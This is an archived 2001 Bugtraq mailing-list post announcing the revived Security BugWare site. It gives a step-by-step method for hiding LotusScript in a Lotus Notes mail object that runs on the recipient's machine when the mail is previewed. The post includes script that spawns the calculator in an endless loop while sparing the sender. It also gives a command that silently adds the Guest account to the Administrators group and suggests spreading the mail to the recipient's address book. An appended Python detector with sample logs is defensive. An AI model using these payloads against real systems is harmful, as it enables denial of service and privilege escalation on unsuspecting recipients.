Bugtraq mailing list archives

Security BugWare Advisory


From: irib () bunker freexion net (Yann)
Date: Mon, 22 Oct 2001 17:06:21 +0200


                    ----[www.securitybugware.org]----

                         < A D V I S O R I E S >

Dear World,

From 1996 to 9th Sep 2001, Hrvoje Crvelin maintained the most explicit website
about bugs, exploits, and solutions. He decided to stop this project.

As there is no such resource on the web, we decided to keep this one alive.

Behind the new Security BugWare is a French non-profit organisation
(association loi 1901). Our aim is to continue Hrvoje's work, for all people
like us who need a centralised, straight-to-the-point bug information page.

To help spread this news, we offer you an exclusive "Trick of the Trade":



               Whacking A Machine With Lotus Notes Mail



COMMAND

    Lotus Notes Client

SYSTEMS AFFECTED

    Lotus Notes Client 5   All releases
    Lotus Notes Client 4.6 All releases

PROBLEM

    The SecurityBugware team found the following, as posted on
    www.securitybugware.org:

    With a little LotusScript in your mail, you can execute anything you want
    on the recipient's computer, even outside of Notes.

    Follow these steps :

    1) Create a new mail, add recipients
    2) Go to the body and click in the menu "Create..Object"
    3) Select "Control" and any object you please such as "ActiveXPlugin Object"
    4) In Client 4.6 right click on the object to get "Properties"
       In Client 5 click on the menu the new "Applet" feature, and go to 
       "Properties"
       then check "run the object when the document is read"
    5) Then select "Edit events" : An event pane opens linked to the object
    6) In the "Initialize" section Add the following code, where "My EMAIL" 
       is your Lotus Notes account name (if you get this part wrong, you'll
       bomb yourself) :

              Sub Initialize
                     Dim TaskId As Integer
                     Dim session As New NotesSession
                     If session.CommonUserName<>"My EMAIL" Then
                        Do
                            TaskId%=Shell("CALC.EXE",1)
                        Loop
                     End If
              End Sub

    7) In the "Terminate" section, do the same :

              Sub Terminate
                     Dim TaskId As Integer
                     Dim session As New NotesSession
                     If session.CommonUserName<>"My EMAIL" Then
                         Do
                            TaskId%=Shell("CALC.EXE",1)
                         Loop
                     End If
              End Sub

    8) Click again on the "Initialize" section
    9) Hit the "Send" button, enjoy ;-)

    Your ActiveX control (or whichever object you chose) gets executed when the
    document is read. If the victim only "previews" his mail without opening
    it, it makes no difference: a preview counts as a read.

    In this example we just run the calculator in a loop, but the possibilities
    are endless: formatting hard drives, sending emails, replicating the script
    by sending it to the whole address book, sending files, stealing files from
    the victim's hard drives without his noticing, etc.

    For instance you could replace the Do .. Loop by :

              TaskId%=Shell("CMD.EXE /C net localgroup " \"Administrators"\" /add guest ",1)

    which silently adds the Guest account to the administrative group.

    In a few words, Lotus Intranet is a giant backdoor in itself.

    After some checks, it seems the SMTP gateway does not let LotusScript pass
    through. This only works inside your interconnected Notes domains.


SOLUTION

    The only solution is to deactivate the preview, and to delete the memo
    before reading it.


-- 
Security Bugware Team
Irib, Jitsu, Kiwi

www.securitybugware.org
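
A defender-side check for the behaviour described in this advisory, as an added example that is not part of the original post: it scans process-creation events for programs started by the Notes client. The pipe-separated log format, the client process names notes.exe and nlnotes.exe, the thresholds and the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumption: executable names of the Notes client; adjust to the deployment.
NOTES_PARENTS = {"notes.exe", "nlnotes.exe"}
# Child programs a mail client has no routine reason to start.
SHELLS = {"cmd.exe", "command.com"}
GROUP_CHANGE = re.compile(r"\bnet1?(\.exe)?\s+localgroup\b.*?/add\b", re.I)
BURST_COUNT, BURST_WINDOW = 5, 10  # same child started 5 times within 10 s

def parse(line):
    """Constructed format: seconds|host|parent_image|child_image|command_line"""
    ts, host, parent, child, cmd = line.rstrip("\n").split("|", 4)
    base = lambda p: p.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return int(ts), host, base(parent), base(child), cmd

def detect(lines):
    """Return (host, rule, detail) findings for processes spawned by Notes."""
    findings, recent, reported = [], defaultdict(list), set()
    for line in lines:
        if not line.strip():
            continue
        ts, host, parent, child, cmd = parse(line)
        if parent not in NOTES_PARENTS:
            continue
        if GROUP_CHANGE.search(cmd):
            findings.append((host, "group-change", cmd))
        elif child in SHELLS:
            findings.append((host, "shell-from-notes", cmd))
        # Sliding window: a Do..Loop payload starts the same program repeatedly.
        window = [t for t in recent[(host, child)] if ts - t < BURST_WINDOW] + [ts]
        recent[(host, child)] = window
        if len(window) >= BURST_COUNT and (host, child) not in reported:
            reported.add((host, child))
            findings.append((host, "spawn-burst", child))
    return findings

# Constructed sample events, not captured from a real system.
NOTES = "C:\\Lotus\\Notes\\nlnotes.exe"
SAMPLE = [f"{100 + i}|WS01|{NOTES}|C:\\WINNT\\system32\\CALC.EXE|CALC.EXE"
          for i in range(5)] + [
    f'120|WS02|{NOTES}|C:\\WINNT\\system32\\cmd.exe|'
    'CMD.EXE /C net localgroup "Administrators" /add guest',
    "130|WS03|C:\\WINNT\\explorer.exe|C:\\WINNT\\system32\\calc.exe|calc.exe",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```
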

